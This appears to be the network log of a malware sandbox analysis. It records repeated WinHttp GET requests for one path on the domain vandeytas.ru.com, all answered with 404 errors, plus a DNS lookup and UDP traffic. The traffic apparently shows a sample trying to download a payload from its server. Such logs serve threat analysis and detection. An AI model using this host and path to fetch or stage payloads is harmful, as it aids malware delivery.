Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com
Source: global traffic	HTTP traffic detected: GET /233_Hlvzmhuinff HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: vandeytas.ru.com

Source: global traffic

DNS traffic detected: DNS query: vandeytas.ru.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:23 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:25 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:27 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:31 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:44 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:47 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:51 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:53 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:55 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:11:57 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:02 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:09 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:15 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:18 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:20 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:22 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 07:12:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
